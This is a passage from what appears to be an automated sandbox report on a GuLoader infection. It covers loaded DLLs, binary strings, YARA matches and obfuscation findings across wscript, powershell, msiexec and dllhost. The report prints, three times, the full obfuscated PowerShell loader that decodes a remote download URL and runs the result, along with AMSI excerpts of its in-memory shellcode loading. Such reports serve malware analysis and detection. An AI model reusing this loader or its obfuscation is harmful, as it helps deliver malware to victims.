Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\RrGCLFamdOMILBfgTztXLHLeIGrTaHIvUdtkIGyLvRBOMtpbECrSjHJgx\nJPhzxOixucOn.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\LocalServer32 source: powershell.exe, 00000006.00000002.2123953554.00000000078E6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: msiexec.pdb source: dllhost.exe, 0000000B.00000002.2965414846.0000000003282000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2966636300.0000000003E3C000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.000000000291C000.00000004.00000001.00040000.00000000.sdmp
Source: Binary string: msiexec.pdbGCTL source: dllhost.exe, 0000000B.00000002.2965414846.0000000003282000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2966636300.0000000003E3C000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.000000000291C000.00000004.00000001.00040000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nJPhzxOixucOn.exe, 0000000A.00000002.2965739593.000000000082E000.00000002.00000001.01000000.00000008.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2965710212.000000000082E000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 00000008.00000003.2689598369.00000000203A4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2800123462.0000000020550000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2800123462.00000000206EE000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687484109.00000000201F9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2802784503.0000000003473000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2805006128.0000000003621000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2123953554.0000000007860000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: msiexec.exe, msiexec.exe, 00000008.00000003.2689598369.00000000203A4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2800123462.0000000020550000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2800123462.00000000206EE000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687484109.00000000201F9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, dllhost.exe, 0000000B.00000002.2966172765.00000000037D0000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.2966172765.000000000396E000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2802784503.0000000003473000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2805006128.0000000003621000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dllhost.pdb source: msiexec.exe, 00000008.00000002.2785751974.0000000004CA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2785925702.0000000004CFA000.00000004.00000020.00020000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000A.00000002.2965896022.00000000008D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Core.pdbWP source: powershell.exe, 00000006.00000002.2131541455.00000000088F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32AC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll)g source: powershell.exe, 00000006.00000002.2123953554.00000000078E6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.2123953554.0000000007860000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dllhost.pdbGCTL source: msiexec.exe, 00000008.00000002.2785751974.0000000004CA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2785925702.0000000004CFA000.00000004.00000020.00020000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000A.00000002.2965896022.00000000008D8000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.2133348411.0000000009DD1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2132644099.0000000008BA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2116981246.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1937354419.0000024B35F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Stvners)$GLObal:gRewhOUnD = [SySTEM.tEXT.eNcodiNg]::aSCII.GeTSTRInG($bIsonOksERnEs244)$globaL:ANspnDeNDEs=$GREWHOUND.suBSTRiNg($ForSkrerbRT,$desiNfICerInGers)<#Nepotismens Bedchair E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Augurer $Roduddragningers $Skoens), (knudemndenes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Gasolenes = [AppDomain]::CurrentDomain.GetAssemblies()$gl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Literalising)), $Skvatmikkel).DefineDynamicModule($Apprises, $false).DefineType($Femaarenes, $Humourers, [System.MulticastDelegate])$P
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Stvners)$GLObal:gRewhOUnD = [SySTEM.tEXT.eNcodiNg]::aSCII.GeTSTRInG($bIsonOksERnEs244)$globaL:ANspnDeNDEs=$GREWHOUND.suBSTRiNg($ForSkrerbRT,$desiNfICerInGers)<#Nepotismens Bedchair E
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUn
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUn
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Bishoping Kropsvisitering Privateje Espying Genes Gossipingly #>;$Scarifies117='Sammensnredes';<#Barometriske Sardanapalian Customiser Miljteknikeren Unwritten #>;$Abovedeck=$Autografsamlers+$host.UI; function Plumet($Pendultrafik){If ($Abovedeck) {$Beedigelsers++;}$Superinsistently=$Proelectric+$Pendultrafik.'Length'-$Beedigelsers; for( $Melolonthine=5;$Melolonthine -lt $Superinsistently;$Melolonthine+=6){$Swiveleye=$Melolonthine;$Warks+=$Pendultrafik[$Melolonthine];$Unconservatively='Mongolism';}$Warks;}function Extralegal($Bostter){ & ($Forfdrenes) ($Bostter);}$Reservationsslipper=Plumet 'WgstrMBoyaroKujonzCorpsiRediglFo melNon,oaBened/Mah r ';$Reservationsslipper+=Plumet 'Lsesu5Knubs. Cl p0Tidv. s til(.esknW Indii rosn LyindFlaunokoncewaugmespanto ReknoNHvekoTfila Kniks1Dolkh0Apnea. ilja0Quali;B lki HjallW,pliniR facn G.no6R,lak4Zygne;Glend retrxAssur6Bibli4S.ear; Mask Camstrrekorv taxi:ensky1Udste3Nob l1Tempt.Hamar0Del b)Perp PharmGUnbuseNyas,c ontok AurioEmitt/Kofan2Udrik0Indig1 Plug0ove,f0 Resp1Godke0fiske1Bicyc FrerF econi .ermrRek.neAgatefN touo.ulfaxTenni/,rriv1 d ta3Ind.u1Knapp.Vin.i0Fldei ';$Feriegiroens=Plumet 'VankeU Ba ySDiarte StanRHaand- Am aaKartoG Gr sE alanNBerustOleac ';$Halmknippernes=Plumet ' astahBaglyt Kon tstripp.attlsK.teg:Glade/Bet l/Pr mudVamperTelexi DerivG usceDuple.SpillgOdorsoHebraokupingin talStrikeSla.e. Vi ecSamenoB,rbim Ngle/ elemu,rfevcDress?a rile In.uxO scupTympaoPaastrReroltAerop=sponsdTangio SidewCondon.ivillTilkmoKi.ofaVarsedUnm.n&BluebiGainldDisgu=U,der1KatsuqSamsi6UdtagCPerfeYT end4Me ryoFarveURepartAllobc Cu loLact.u Anve- Bil.a SkypV ShinhLargiAWhisk3 Goom_Unin v BaffULeftiUCeritU GallrKredifRisikOEmb oONavewB agesqkanurCHaranrDaghod Cod 8Touch ';$Unpredicableness=Plumet 'Rvert>Oshac ';$Forfdrenes=Plumet 'Elu iIRen.eeDisruXPreda ';$Melolonthinetalianation='Synentognath';$Klagen142='\Gesjftigere.Sig';Extralegal (Plumet ' Kant$ gestG,opovlAfrivo gar bAfkrya nil lF rpe:AcculsCountTFederETabulNSubenO Hoo TUnvitYU,eskp BegrIK prosExcerTSoun.=Ut,li$SpencERascanShittvba uq:czecha KnuspGerrhP.ositDFefniACor ntUpdivAPilsn+Stf,o$StatukBort LBytniAU calG.ubsiEfolkenkosmo1Af,ik4T att2 Vacc ');Extralegal (Plumet 'Ekstr$Time GReneglTriesoParjrBEv ghA PhotlOpt d:NonreK H veAAnatoL ConclTha lIEnslaGAnti rso stAF,ypaFRokkeIPerig= B un$botchhBl fraShrimL MentMCitrokS,ntiN ammeiOverpP arplpAutheEEuroprTankenBiko,eTildnsCong .angorsR velPSpattlPredei HandTKl,ss( Svag$OpholuStrafn Vasop MosaRPrimaeNor iDRaa lISlutdcDicala UnmeBSkravlFeas,EInf rNDr tte LamasPre.osHandl)Carra ');Extralegal (Plumet 'Kofil[ReplaNBestrESuppeTDovec.SkattsVarieEForklR EntevH,andIEu ogcOpm ge ussp SocioDeuteIStud,NHundetRhabdM BlseAVivi.N Udnva AnarG,istiEAbomaRPrear]ung d:Chond: U bysVinylEBirkeC Fi muGavagRRevaniZo.reTsistsYPlastPOptimrMaleno DecrTEks.oo ,ncaCHal hoJereeL Wame Premu=Degra enspn[ U bunA omaE LibatUn Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B7500BD pushad ; iretd 1_2_00007FFD9B7500C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0794731E push esp; ret 6_2_0794731F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_07947323 push esp; ret 6_2_0794732E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_079481B8 push esp; ret 6_2_079481CB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_07940F2F push eax; ret 6_2_07940F41
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_07947F65 push esp; ret 6_2_07947F66
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_07947F6C push esp; ret 6_2_07947F7F
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038009AD push ecx; mov dword ptr [esp], ecx 11_2_038009B6
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03101059 push 00000015h; retf 11_2_031010CD
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030FF32F push ss; retn 0000h 11_2_030FF337
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030F221E push edi; iretd 11_2_030F2245
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030F2220 push edi; iretd 11_2_030F2245
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030F3232 push 00000000h; ret 11_2_030F3247
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030F3249 push 00000000h; ret 11_2_030F3247
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030EE132 push ebx; ret 11_2_030EE13E
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030F5171 push ecx; retf 11_2_030F518A
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_031010C0 push 00000015h; retf 11_2_031010CD
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030EE794 push ds; retf 11_2_030EE7A2
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030F15CD push edi; iretd 11_2_030F15D2
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030F4BE8 push ds; retf 11_2_030F4C0E
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030F4BF0 push ds; retf 11_2_030F4C0E
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030FB932 push eax; retf 11_2_030FB933
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030F589D push B6C3BD05h; ret 11_2_030F58AC
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03100F5A push es; retf 11_2_03100F91
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030EFFE0 push 3578BDFFh; retf 9DAFh 11_2_030F0098
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
